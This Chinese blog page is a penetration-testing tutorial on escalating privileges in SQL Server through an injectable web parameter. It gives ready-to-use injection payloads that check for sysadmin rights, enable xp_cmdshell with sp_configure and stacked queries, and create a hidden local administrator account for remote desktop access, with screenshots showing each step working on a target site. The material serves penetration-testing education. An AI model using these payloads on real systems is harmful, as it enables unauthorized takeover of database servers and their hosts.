<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />

    

    
    <title>数据库提权(二) sql server 提权 | Hexo</title>
    
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="keywords" content="渗透,安全" />
    
    <meta name="description" content="简介xp_cmdshell 能将命令字符串作为操作系统的命令执行，并以文本行的形式返回执行结果，用户可以利用此方法来执行任意系统命令。 语法为： 1exec master..xp_cmdshell &quot;dos命令&quot;  利用前提条件 是管理员账号 xp_cmdshell 存在 xp_cmdshell 已开启 (SQL Server 2005 及以上版本默认关闭)  若服务未开启，执行 xp_cmdsh">
<meta property="og:type" content="article">
<meta property="og:title" content="数据库提权(二) sql server 提权">
<meta property="og:url" content="http://yoursite.com/2020/10/09/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83(%E4%BA%8C)%20sql%20server%20%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="简介xp_cmdshell 能将命令字符串作为操作系统的命令执行，并以文本行的形式返回执行结果，用户可以利用此方法来执行任意系统命令。 语法为： 1exec master..xp_cmdshell &quot;dos命令&quot;  利用前提条件 是管理员账号 xp_cmdshell 存在 xp_cmdshell 已开启 (SQL Server 2005 及以上版本默认关闭)  若服务未开启，执行 xp_cmdsh">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://my.lipeilipei.top/images/2020/20201127210949.png">
<meta property="article:published_time" content="2020-10-09T04:00:00.000Z">
<meta property="article:modified_time" content="2020-11-27T13:13:56.188Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://my.lipeilipei.top/images/2020/20201127210949.png">
    

    

    
        <link rel="icon" href="/css/images/bitbug_favicon.ico" />
    

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/libs/titillium-web/styles.css">

    
<link rel="stylesheet" href="/libs/source-code-pro/styles.css">


    
<link rel="stylesheet" href="/css/style.css">


    
<script src="/libs/jquery/3.5.0/jquery.min.js"></script>

    
    
        
<link rel="stylesheet" href="/libs/lightgallery/css/lightgallery.min.css">

    
    
        
<link rel="stylesheet" href="/libs/justified-gallery/justifiedGallery.min.css">

    
    
    
        <script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?8229091b2a281af4b398716fce50a2cb";
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
})();
</script>

    
    


<meta name="generator" content="Hexo 4.2.1"></head>

<body>
    <div id="wrap">
        <header id="header">
    <div id="header-outer" class="outer">
        <div class="container">
            <div class="container-inner">
                <div id="header-title">
                    <h1 class="logo-wrap">
                        <a href="/" class="logo"></a>
                    </h1>
                    
                </div>
                <div id="header-inner" class="nav-container">
                    <a id="main-nav-toggle" class="nav-icon fa fa-bars"></a>
                    <div class="nav-container-inner">
                        <ul id="main-nav">
                            
                                <li class="main-nav-list-item" >
                                    <a class="main-nav-list-link" href="/">Home</a>
                                </li>
                            
                                    <ul class="main-nav-list"><li class="main-nav-list-item"><a class="main-nav-list-link" href="/categories/Web%E5%BC%80%E5%8F%91/">Web开发</a></li><li class="main-nav-list-item"><a class="main-nav-list-link" href="/categories/%E5%AE%89%E5%85%A8/">安全</a></li><li class="main-nav-list-item"><a class="main-nav-list-link" href="/categories/%E6%B5%8B%E8%AF%95/">测试</a></li><li class="main-nav-list-item"><a class="main-nav-list-link" href="/categories/%E7%88%AC%E8%99%AB/">爬虫</a></li><li class="main-nav-list-item"><a class="main-nav-list-link" href="/categories/%E8%87%AA%E5%8A%A8%E5%8C%96/">自动化</a></li></ul>
                                
                                <li class="main-nav-list-item" >
                                    <a class="main-nav-list-link" href="/about/index.html">About</a>
                                </li>
                            
                        </ul>
                        <nav id="sub-nav">
                            <div id="search-form-wrap">

    <form class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="Search" />
        <button type="submit" class="search-form-submit"></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="Type something..." />
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>


</div>
                        </nav>
                    </div>
                </div>
            </div>
        </div>
    </div>
</header>

        <div class="container">
            <div class="main-body container-inner">
                <div class="main-body-inner">
                    <section id="main">
                        <div class="main-body-header">
    <h1 class="header">
    
    <a class="page-title-link" href="/categories/%E5%AE%89%E5%85%A8/">安全</a>
    </h1>
</div>

                        <div class="main-body-content">
                            <article id="post-数据库提权(二) sql server 提权" class="article article-single article-type-post" itemscope itemprop="blogPost">
    <div class="article-inner">
        
            <header class="article-header">
                
    
        <h1 class="article-title" itemprop="name">
        数据库提权(二) sql server 提权
        </h1>
    

            </header>
        
        
            <div class="article-meta">
                
  <div class="article-date">
    <i class="fa fa-calendar"></i>
    <a href="/2020/10/09/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83(%E4%BA%8C)%20sql%20server%20%E6%8F%90%E6%9D%83/" class="article-date">
       <time datetime="2020-10-09T04:00:00.000Z" itemprop="datePublished">2020-10-09</time>
    </a>
  </div>


<div class="article-date">
  <i class="fa fa-calendar-plus-o"></i>
  <a href="/2020/10/09/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83(%E4%BA%8C)%20sql%20server%20%E6%8F%90%E6%9D%83/" class="article-date">
     <time datetime="2020-11-27T13:13:56.188Z" itemprop="dateModified">2020-11-27</time>
  </a>
</div>


                

                
    <div class="article-tag">
        <i class="fa fa-tag"></i>
        <a class="tag-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a>, <a class="tag-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透</a>
    </div>

                

                

            </div>
        
        
        <div class="article-entry" itemprop="articleBody">
            

            

            

            <h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>xp_cmdshell 能将命令字符串作为操作系统的命令执行，并以文本行的形式返回执行结果，用户可以利用此方法来执行任意系统命令。</p>
<p>语法为：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec master..xp_cmdshell "dos命令"</span><br></pre></td></tr></table></figure>

<h2 id="利用前提条件"><a href="#利用前提条件" class="headerlink" title="利用前提条件"></a>利用前提条件</h2><ol>
<li>是管理员账号</li>
<li>xp_cmdshell 存在</li>
<li>xp_cmdshell 已开启 (SQL Server 2005 及以上版本默认关闭)</li>
</ol>
<p>若服务未开启，执行 xp_cmdshell 命令会出现如下提示</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">消息 15281，级别 16，状态 1，过程 xp_cmdshell，第 1 行</span><br></pre></td></tr></table></figure>

<h2 id="提权步骤"><a href="#提权步骤" class="headerlink" title="提权步骤"></a>提权步骤</h2><p><img src="http://my.lipeilipei.top/images/2020/20201106175136.png" alt=""></p>
<p>这个地址存在 sql 注入，探测是否存在注入不再赘述，直接从提权开始</p>
<h5 id="1-判断是否是管理员"><a href="#1-判断是否是管理员" class="headerlink" title="1. 判断是否是管理员"></a>1. 判断是否是管理员</h5><p>只有 <code>sysadmin</code> 组的用户才能执行 xp_cmdshell，用以下注入语句判断用户是否为 sysadmin 组的用户</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and (select IS_SRVROLEMEMBER (&#39;sysadmin&#39;))&#x3D;1--+</span><br></pre></td></tr></table></figure>
<p><img src="http://my.lipeilipei.top/images/2020/20201106175539.png" alt=""></p>
<p>没有报错正常返回，说明 <code>select IS_SRVROLEMEMBER (&#39;sysadmin&#39;)=1</code> 的结果为真，也就是说数据库的用户属于 sysadmin 管理员组。如果页面没有正常返回，说明用户不属于 sysadmin 组，则无法提权，就不用继续进行后面的操作了。</p>
<h5 id="2-判断数据库中是否存在-xp-cmdshell"><a href="#2-判断数据库中是否存在-xp-cmdshell" class="headerlink" title="2. 判断数据库中是否存在 xp_cmdshell"></a>2. 判断数据库中是否存在 xp_cmdshell</h5><p>语法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and 1&#x3D;(select count(*) from master.dbo.sysobjects where xtype &#x3D; &#39;x&#39; and name &#x3D; &#39;xp_cmdshell&#39;)--+</span><br></pre></td></tr></table></figure>
<p><img src="http://my.lipeilipei.top/images/2020/20201106180139.png" alt=""></p>
<p>页面正常返回，说明数据库中存在组件 xp_cmdshell</p>
<h5 id="3-判断-xp-cmdshell-是否启用"><a href="#3-判断-xp-cmdshell-是否启用" class="headerlink" title="3. 判断 xp_cmdshell 是否启用"></a>3. 判断 xp_cmdshell 是否启用</h5><p>语法：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># mssql 支持多条语句同时执行，用分号 ; 隔开</span></span><br><span class="line">;exec master..xp_cmdshell "net user name password /add"<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="http://my.lipeilipei.top/images/2020/20201106180704.png" alt=""></p>
<p>出现这种报错，说明 xp_cmdshell 没有开启</p>
<h5 id="4-开启-xp-cmdshell"><a href="#4-开启-xp-cmdshell" class="headerlink" title="4. 开启 xp_cmdshell"></a>4. 开启 xp_cmdshell</h5><p>先执行如下，这里用到了 <code>sp_configure</code> 方法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;exec sp_configure &#39;show advanced options&#39;,1;reconfigure;exec sp_configure &#39;xp_cmdshell&#39;,1;reconfigure;--+</span><br></pre></td></tr></table></figure>
<p><img src="http://my.lipeilipei.top/images/2020/20201106181413.png" alt=""></p>
<p>再执行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;exec master..xp_cmdshell &quot;ver&quot;--+</span><br></pre></td></tr></table></figure>
<p><img src="http://my.lipeilipei.top/images/2020/20201106181458.png" alt=""></p>
<p>执行完这两句都没有报错，说明 xp_cmdshell 已经开启成功</p>
<h5 id="5-添加系统管理员用户，提权"><a href="#5-添加系统管理员用户，提权" class="headerlink" title="5. 添加系统管理员用户，提权"></a>5. 添加系统管理员用户，提权</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 添加用户</span><br><span class="line">;exec master..xp_cmdshell &quot;net user pei password &#x2F;add&quot;--+</span><br><span class="line"></span><br><span class="line"># 用户添加到管理员组</span><br><span class="line">;exec master..xp_cmdshell &quot;net localgroup administrators pei &#x2F;add&quot;--+</span><br></pre></td></tr></table></figure>
<p><img src="http://my.lipeilipei.top/images/2020/20201106183326.png" alt=""></p>
<p>使用添加的用户登陆远程桌面成功，执行 <code>net user pei</code> 可以看到是在管理员组</p>
<p><img src="http://my.lipeilipei.top/images/2020/20201106183715.png" alt=""></p>

        </div>
        <footer class="article-footer">
            

    <div class="bdsharebuttonbox">
    <a href="#" class="bds_more" data-cmd="more">分享到：</a>
    <a href="#" class="bds_qzone" data-cmd="qzone" title="分享到QQ空间">QQ空间</a>
    <a href="#" class="bds_tsina" data-cmd="tsina" title="分享到新浪微博">新浪微博</a>
    <a href="#" class="bds_tqq" data-cmd="tqq" title="分享到腾讯微博">腾讯微博</a>
    <a href="#" class="bds_renren" data-cmd="renren" title="分享到人人网">人人网</a>
    <a href="#" class="bds_weixin" data-cmd="weixin" title="分享到微信">微信</a>
</div>
<script>
window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"share":{"bdSize":16}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
</script>
<style>
    .bdshare_popup_box {
        border-radius: 4px;
        border: #e1e1e1 solid 1px;
    }
    .bdshare-button-style0-16 a,
    .bdshare-button-style0-16 .bds_more {
        padding-left: 20px;
        margin: 6px 10px 6px 0;
    }
    .bdshare_dialog_list a,
    .bdshare_popup_list a,
    .bdshare_popup_bottom a {
        font-family: 'Microsoft Yahei';
    }
    .bdshare_popup_top {
        display: none;
    }
    .bdshare_popup_bottom {
        height: auto;
        padding: 5px;
    }
</style>



        </footer>
    </div>
    <script type="application/ld+json">
    {
        "@context": "https://schema.org",
        "@type": "BlogPosting",
        "author": {
            "@type": "Person",
            "name": "John Doe"
        },
        "headline": "数据库提权(二) sql server 提权",
        "image": "http://yoursite.comhttp://my.lipeilipei.top/images/2020/20201127210949.png",
        "keywords": "渗透 安全",
        "genre": "安全",
        "datePublished": "2020-10-09",
        "dateCreated": "2020-10-09",
        "dateModified": "2020-11-27",
        "url": "http://yoursite.com/2020/10/09/数据库提权(二) sql server 提权/",
        "description": "简介xp_cmdshell 能将命令字符串作为操作系统的命令执行，并以文本行的形式返回执行结果，用户可以利用此方法来执行任意系统命令。
语法为：
1exec master..xp_cmdshell "dos命令"

利用前提条件
是管理员账号
xp_cmdshell 存在
xp_cmdshell 已开启 (SQL Server 2005 及以上版本默认关闭)

若服务未开启，执行 xp_cmdsh",
        "wordCount": 217
    }
</script>

</article>

    <section id="comments">
    
    </section>



                        </div>
                    </section>
                    <aside id="sidebar">
    <a class="sidebar-toggle" title="Expand Sidebar"><i class="toggle icon"></i></a>
    <div class="sidebar-top">
        <p>follow:</p>
        <ul class="social-links">
            
                
                <li>
                    <a class="social-tooltip" title="github" href="https://github.com/peilipeili" target="_blank" rel="noopener">
                        <i class="icon fa fa-github"></i>
                    </a>
                </li>
                
            
        </ul>
    </div>
    
        
<nav id="article-nav">
    
    
        <a href="/2020/10/05/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83(%E4%B8%80)%20mysql%20UDF%20%E6%8F%90%E6%9D%83/" id="article-nav-older" class="article-nav-link-wrap">
        <strong class="article-nav-caption">older</strong>
        <p class="article-nav-title">数据库提权(一) mysql UDF 提权</p>
        <i class="icon fa fa-chevron-left" id="icon-chevron-left"></i>
        </a>
    
</nav>

    
    <div class="widgets-container">
        
            
                
    <div class="widget-wrap">
        <h3 class="widget-title">recents</h3>
        <div class="widget">
            <ul id="recent-post" class="">
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2020/10/09/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83(%E4%BA%8C)%20sql%20server%20%E6%8F%90%E6%9D%83/" class="thumbnail">
    
    
        <span style="background-image:url(http://my.lipeilipei.top/images/2020/20201127210949.png)" alt="数据库提权(二) sql server 提权" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"><a class="article-category-link" href="/categories/%E5%AE%89%E5%85%A8/">安全</a></p>
                            <p class="item-title"><a href="/2020/10/09/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83(%E4%BA%8C)%20sql%20server%20%E6%8F%90%E6%9D%83/" class="title">数据库提权(二) sql server 提权</a></p>
                            <p class="item-date"><time datetime="2020-10-09T04:00:00.000Z" itemprop="datePublished">2020-10-09</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2020/10/05/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83(%E4%B8%80)%20mysql%20UDF%20%E6%8F%90%E6%9D%83/" class="thumbnail">
    
    
        <span style="background-image:url(http://my.lipeilipei.top/images/2020/20201127211020.png)" alt="数据库提权(一) mysql UDF 提权" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"><a class="article-category-link" href="/categories/%E5%AE%89%E5%85%A8/">安全</a></p>
                            <p class="item-title"><a href="/2020/10/05/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83(%E4%B8%80)%20mysql%20UDF%20%E6%8F%90%E6%9D%83/" class="title">数据库提权(一) mysql UDF 提权</a></p>
                            <p class="item-date"><time datetime="2020-10-05T04:00:00.000Z" itemprop="datePublished">2020-10-05</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2020/10/01/windows%E5%8F%8D%E5%BC%B9shell/" class="thumbnail">
    
    
        <span style="background-image:url(http://my.lipeilipei.top/images/2020/20201120123010.png)" alt="Windows 反弹 shell" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"><a class="article-category-link" href="/categories/%E5%AE%89%E5%85%A8/">安全</a></p>
                            <p class="item-title"><a href="/2020/10/01/windows%E5%8F%8D%E5%BC%B9shell/" class="title">Windows 反弹 shell</a></p>
                            <p class="item-date"><time datetime="2020-10-01T04:00:00.000Z" itemprop="datePublished">2020-10-01</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2020/09/30/msf+python%E5%85%8D%E6%9D%80360%E7%81%AB%E7%BB%92/" class="thumbnail">
    
    
        <span style="background-image:url(http://my.lipeilipei.top/images/2020/msf_logo.jpg)" alt="msf+python免杀360火绒" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"><a class="article-category-link" href="/categories/%E5%AE%89%E5%85%A8/">安全</a></p>
                            <p class="item-title"><a href="/2020/09/30/msf+python%E5%85%8D%E6%9D%80360%E7%81%AB%E7%BB%92/" class="title">msf+python免杀360火绒</a></p>
                            <p class="item-date"><time datetime="2020-09-30T04:00:00.000Z" itemprop="datePublished">2020-09-30</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2020/09/24/%E6%9F%90%E5%8D%9A%E5%BD%A9%E7%BD%91%E7%AB%99%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98/" class="thumbnail">
    
    
        <span style="background-image:url(http://my.lipeilipei.top/images/2020/20200922131655.png)" alt="某博彩网站渗透实战" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"><a class="article-category-link" href="/categories/%E5%AE%89%E5%85%A8/">安全</a></p>
                            <p class="item-title"><a href="/2020/09/24/%E6%9F%90%E5%8D%9A%E5%BD%A9%E7%BD%91%E7%AB%99%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98/" class="title">某博彩网站渗透实战</a></p>
                            <p class="item-date"><time datetime="2020-09-24T04:00:00.000Z" itemprop="datePublished">2020-09-24</time></p>
                        </div>
                    </li>
                
            </ul>
        </div>
    </div>

            
        
    </div>
</aside>

                </div>
            </div>
        </div>
        <footer id="footer">
    <div class="container">
        <div class="container-inner">
            <a id="back-to-top" href="javascript:;"><i class="icon fa fa-angle-up"></i></a>
            <div class="credit">
                <h1 class="logo-wrap">
                    <a href="/" class="logo"></a>
                </h1>
                <p>&copy; 2020 John Doe</p>
                
                <p>Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>. Theme by <a href="https://github.com/ppoffice" target="_blank">PPOffice</a></p>
                
            </div>
            <div class="footer-plugins">
              
    


            </div>
        </div>
    </div>
</footer>

    </div>
    


    
        
<script src="/libs/lightgallery/js/lightgallery.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-thumbnail.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-pager.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-autoplay.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-fullscreen.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-zoom.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-hash.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-share.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-video.min.js"></script>

    
    
        
<script src="/libs/justified-gallery/jquery.justifiedGallery.min.js"></script>

    
    

    
    
    



<!-- Custom Scripts -->

<script src="/js/main.js"></script>


</body>
</html>
